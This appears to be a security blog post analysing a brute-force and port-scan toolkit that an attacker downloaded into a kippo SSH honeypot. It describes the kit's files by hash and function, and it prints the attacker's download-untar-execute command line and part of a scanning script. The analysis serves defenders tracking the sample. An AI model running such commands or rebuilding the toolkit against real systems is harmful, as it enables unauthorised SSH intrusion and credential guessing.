Skip navigation

Monthly Archives: January 2013

After successfully brute forcing their way into kippo, the attacker downloaded a collection of bruteforce/portscan tools, untarred them, and kicked the whole thing off.

dev:~# wget;tar xzvf go.jpg;rm -rf go.jpg;cd go;./go 61

The malware itself seemed mostly unmodified from the last time it was reported on, but the address it phones home to was different, so I thought I’d post this so anyone dealing with the same sample has a record of movements.


1, 2, 3, 4, 5, 6, common
– these are just lists of usernames/passwords

– aab6510d149ddfbdf3598c4b94c4b7b3
– executes ‘pscan2’
– copies each password list into ‘mfu.txt’, and then launches ‘ssh-scan 100’

– a213ebd69fbc11d612d0374b373f65d8
– 615c08bb1acdf2f21490450991766187
– takes a list of users and passwords, dumps all user:pass permutations into ‘pass_file’

– the user:pass permutations from ‘’

– cbf0f41bbbafb1c2609bedb943be3b36

– 92c4c68480e699aa012b26c82a787248
– sorts ‘bios.txt’ into a unique list, saves in ‘mfu.txt’, launches ‘./ssh-scan 300’

– acba0143d0cbcf8092b8b44d914d7983
– given a block and a port, answers with responding ips in that block

– 39acbfc1e983e45308cdab2d3ec4bf34
– a bash script that checks if you are root. If you are, it renames ‘/usr/bin/mail’. This is presumably to mess with any IDS on the system.

– b51a52c9c82bb4401659b4c17c60f89f
– responsible for the content in ‘bios.txt’

– contains the results from ‘a’

– gathers system information, saves it to ‘info2’, mails it to
– given the first 3 quarters of an IP address, executes ‘a’ on each of the 255 addresses within that space
– periodically, the results are mailed home to
– the author has also never heard of a for loop, as there are 255 lines of this:

./a $1.11
./a $1.12
./a $1.13
./a $1.14
./a $1.15
./a $1.16
./a $1.17
./a $1.18
./a $1.19
./a $1.20

    Wall of Shame:

Attack Source:
Malware Host:
Malware Type: portscan / bruteforce
Phones Home: /